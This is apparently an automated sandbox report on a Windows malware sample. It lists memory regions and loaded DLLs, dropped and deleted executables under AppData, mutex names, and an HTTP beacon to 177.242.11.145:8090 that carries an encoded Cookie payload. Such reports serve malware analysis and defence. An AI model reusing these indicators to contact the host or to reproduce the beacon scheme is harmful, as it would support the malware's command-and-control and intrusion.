pagefile_0x0000000002440000	0x02440000	0x0251efff	Pagefile Backed Memory	r	-
private_0x0000000002520000	0x02520000	0x0255ffff	Private Memory	rw	-
private_0x0000000002560000	0x02560000	0x0259ffff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0260ffff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0270ffff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0280ffff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028fffff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0284ffff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x0288ffff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x028fffff	Private Memory	rw	-
private_0x0000000002900000	0x02900000	0x029fffff	Private Memory	rw	-
private_0x0000000002a00000	0x02a00000	0x02afffff	Private Memory	rw	-
private_0x0000000002b00000	0x02b00000	0x02bfffff	Private Memory	rw	-
private_0x0000000002c00000	0x02c00000	0x02d7ffff	Private Memory	rw	-
private_0x0000000002c00000	0x02c00000	0x02d4ffff	Private Memory	rw	-
private_0x0000000002c00000	0x02c00000	0x02cfffff	Private Memory	rw	-
private_0x0000000002d40000	0x02d40000	0x02d4ffff	Private Memory	rw	-
private_0x0000000002d70000	0x02d70000	0x02d7ffff	Private Memory	rw	-
ntdsapi.dll	0x73770000	0x73787fff	Memory Mapped File	rwx	-
dwmapi.dll	0x73790000	0x737a2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x737b0000	0x7382ffff	Memory Mapped File	rwx	-
esent.dll	0x73830000	0x739d2fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x73b80000	0x73b87fff	Memory Mapped File	rwx	-
wow64win.dll	0x73b90000	0x73bebfff	Memory Mapped File	rwx	-
wow64.dll	0x73bf0000	0x73c2efff	Memory Mapped File	rwx	-
rasadhlp.dll	0x747d0000	0x747d5fff	Memory Mapped File	rwx	-
nlaapi.dll	0x747e0000	0x747effff	Memory Mapped File	rwx	-
sensapi.dll	0x747f0000	0x747f5fff	Memory Mapped File	rwx	-
rtutils.dll	0x74800000	0x7480cfff	Memory Mapped File	rwx	-
winnsi.dll	0x74810000	0x74816fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x74820000	0x7483bfff	Memory Mapped File	rwx	-
dnsapi.dll	0x74840000	0x74883fff	Memory Mapped File	rwx	-
ntmarta.dll	0x74890000	0x748b0fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748c0000	0x748fafff	Memory Mapped File	rwx	-
cryptsp.dll	0x74900000	0x74915fff	Memory Mapped File	rwx	-
wtsapi32.dll	0x74920000	0x7492cfff	Memory Mapped File	rwx	-
userenv.dll	0x74930000	0x74946fff	Memory Mapped File	rwx	-
profapi.dll	0x74a50000	0x74a5afff	Memory Mapped File	rwx	-
rasman.dll	0x74a60000	0x74a74fff	Memory Mapped File	rwx	-
rasapi32.dll	0x74a90000	0x74ae1fff	Memory Mapped File	rwx	-
winspool.drv	0x74af0000	0x74b40fff	Memory Mapped File	rwx	-
comctl32.dll	0x74b50000	0x74cedfff	Memory Mapped File	rwx	-
msvfw32.dll	0x74cf0000	0x74d10fff	Memory Mapped File	rwx	-
dciman32.dll	0x74d20000	0x74d25fff	Memory Mapped File	rwx	-
ddraw.dll	0x74d30000	0x74e16fff	Memory Mapped File	rwx	-
glu32.dll	0x74e20000	0x74e41fff	Memory Mapped File	rwx	-
opengl32.dll	0x74e50000	0x74f17fff	Memory Mapped File	rwx	-
secur32.dll	0x74f20000	0x74f27fff	Memory Mapped File	rwx	-
winmm.dll	0x74f30000	0x74f61fff	Memory Mapped File	rwx	-
msacm32.dll	0x74f70000	0x74f83fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fa0000	0x74fabfff	Memory Mapped File	rwx	-
sspicli.dll	0x74fb0000	0x7500ffff	Memory Mapped File	rwx	-
urlmon.dll	0x75010000	0x75145fff	Memory Mapped File	rwx	-
msctf.dll	0x751e0000	0x752abfff	Memory Mapped File	rwx	-
gdi32.dll	0x752b0000	0x7533ffff	Memory Mapped File	rwx	-
msasn1.dll	0x75340000	0x7534bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x75350000	0x753d2fff	Memory Mapped File	rwx	-
wintrust.dll	0x753e0000	0x7540cfff	Memory Mapped File	rwx	-
kernelbase.dll	0x754a0000	0x754e5fff	Memory Mapped File	rwx	-
kernel32.dll	0x754f0000	0x755fffff	Memory Mapped File	rwx	-
advapi32.dll	0x75600000	0x7569ffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75720000	0x757cbfff	Memory Mapped File	rwx	-
ole32.dll	0x757d0000	0x7592bfff	Memory Mapped File	rwx	-
iertutil.dll	0x75930000	0x75b2afff	Memory Mapped File	rwx	-
setupapi.dll	0x75b30000	0x75cccfff	Memory Mapped File	rwx	-
crypt32.dll	0x75cd0000	0x75decfff	Memory Mapped File	rwx	-
ws2_32.dll	0x75df0000	0x75e24fff	Memory Mapped File	rwx	-
nsi.dll	0x75e30000	0x75e35fff	Memory Mapped File	rwx	-
user32.dll	0x75e40000	0x75f3ffff	Memory Mapped File	rwx	-
imm32.dll	0x75f40000	0x75f9ffff	Memory Mapped File	rwx	-
sechost.dll	0x75fa0000	0x75fb8fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x75fc0000	0x760affff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x760b0000	0x760d6fff	Memory Mapped File	rwx	-
psapi.dll	0x760e0000	0x760e4fff	Memory Mapped File	rwx	-
wldap32.dll	0x760f0000	0x76134fff	Memory Mapped File	rwx	-
shlwapi.dll	0x76140000	0x76196fff	Memory Mapped File	rwx	-
devobj.dll	0x761a0000	0x761b1fff	Memory Mapped File	rwx	-
normaliz.dll	0x761c0000	0x761c2fff	Memory Mapped File	rwx	-
wininet.dll	0x761d0000	0x762c4fff	Memory Mapped File	rwx	-
shell32.dll	0x762d0000	0x76f19fff	Memory Mapped File	rwx	-
usp10.dll	0x76f20000	0x76fbcfff	Memory Mapped File	rwx	-
oleaut32.dll	0x76fc0000	0x7704efff	Memory Mapped File	rwx	-
private_0x0000000077050000	0x77050000	0x7716efff	Private Memory	rwx	-
private_0x0000000077170000	0x77170000	0x77269fff	Private Memory	rwx	-
ntdll.dll	0x77270000	0x77418fff	Memory Mapped File	rwx	-
lpk.dll	0x77420000	0x77429fff	Memory Mapped File	rwx	-
ntdll.dll	0x77450000	0x775cffff	Memory Mapped File	rwx	-
private_0x000000007ef47000	0x7ef47000	0x7ef49fff	Private Memory	rw	-
private_0x000000007ef4a000	0x7ef4a000	0x7ef4cfff	Private Memory	rw	-
private_0x000000007ef4d000	0x7ef4d000	0x7ef4ffff	Private Memory	rw	-
private_0x000000007ef50000	0x7ef50000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-
For performance reasons, the remaining 10 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

File (3)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	type = size	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\footerdroid.exe	-	1	Fn

Module (276)

Operation	Module	Additional Information	Count	Logfile
Load	USER32.dll	base_address = 0x75e40000	1	Fn
Load	KERNEL32.dll	base_address = 0x754f0000	1	Fn
Load	user32.dll	base_address = 0x75e40000	2	Fn
Load	advapi32.dll	base_address = 0x75600000	1	Fn
Load	shell32.dll	base_address = 0x762d0000	1	Fn
Load	crypt32.dll	base_address = 0x75cd0000	1	Fn
Load	urlmon.dll	base_address = 0x75010000	1	Fn
Load	userenv.dll	base_address = 0x74930000	1	Fn
Load	wininet.dll	base_address = 0x761d0000	1	Fn
Load	wtsapi32.dll	base_address = 0x74920000	1	Fn
Get Handle	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe	base_address = 0x400000	3	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, size = 260	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f8ec	249	Fn
Get Address	-	function = LoadLibraryA, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = GetProcAddress, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualProtect, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x75e6ae5f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeConsole, address_out = 0x755a6aa8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpA, address_out = 0x7551eceb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x755011c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x755011a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75501809	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Map	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, desired_access = FILE_MAP_READ	1	Fn

Service (1)

Operation	Additional Information	Success	Count	Logfile
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = LDWCN705BA84C, wndproc_parameter = 0		1	Fn

System (29)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = Ticks, time = 46784	3	Fn
Get Time	type = Ticks, time = 47798	1	Fn
Get Time	type = Ticks, time = 48812	1	Fn
Get Time	type = Ticks, time = 49826	1	Fn
Get Time	type = Ticks, time = 50903	1	Fn
Get Time	type = Ticks, time = 51917	1	Fn
Get Time	type = Ticks, time = 51995	2	Fn
Get Time	type = Ticks, time = 52931	1	Fn
Get Time	type = Ticks, time = 53945	1	Fn
Get Time	type = Ticks, time = 54959	1	Fn
Get Time	type = Ticks, time = 55973	1	Fn
Get Time	type = Ticks, time = 56987	1	Fn
Get Time	type = Ticks, time = 57111	2	Fn
Get Time	type = Ticks, time = 58001	1	Fn
Get Time	type = Ticks, time = 59015	1	Fn
Get Time	type = Ticks, time = 60029	1	Fn
Get Time	type = Ticks, time = 61043	3	Fn
Get Time	type = Ticks, time = 61074	1	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (4)

Operation	Additional Information	Count	Logfile
Create	mutex_name = PEM548	1	Fn
Create	mutex_name = Global\I705BA84C	1	Fn
Create	mutex_name = Global\M705BA84C	1	Fn
Release	mutex_name = Global\I705BA84C	1	Fn

Network Behavior

HTTP Sessions (1)

Information	Value
Total Data Sent	341 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	177.242.11.145

HTTP Session #1

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	177.242.11.145
Server Port	8090
Data Sent	341
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 177.242.11.145, server_port = 8090	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Cookie: 38949=fn+eLH0NvESEtpnpJHzd/kYYgosDlHksc5sfhit+zDc+jCa/c5HnMHCOS62r/s4/fX16sLUeJqZGSfHPgMzR0D6agzoCfNtusA1OLRmqQSmQT+E7vMTG1Xa66fFWu6+5FkvVe7MUJHBx91ejCDH+r0AUUiPQSswnFNuPSu0sHecUIFz25/FLMNnnvjHS35xX+dSn8xnkBNhUAYgifEH6RmO5Gd2nonX7+V8xzDTQ/nTOBKhRrX1k7sPm/VaaaBlaITgURArUozmTNbJusGvUNxi5x2Fs6UmJW8ei6mduU/cJrvMJgbIVEgXyw/bf2wIG5/XtkJTuRAShXN7HBZhi0Jye2Byjopuer979XFtfiZrPTzK5+VoU4kXu0nOTekQothOb2Nfh6DPTEyFCJRgpyuW1jx6lWPljA94rDn/fdl0Lh4yq, url = 177.242.11.145	1	Fn

Notifications (1/1)

Monitored Processes

Behavior Information - Grouped by Category

Before

After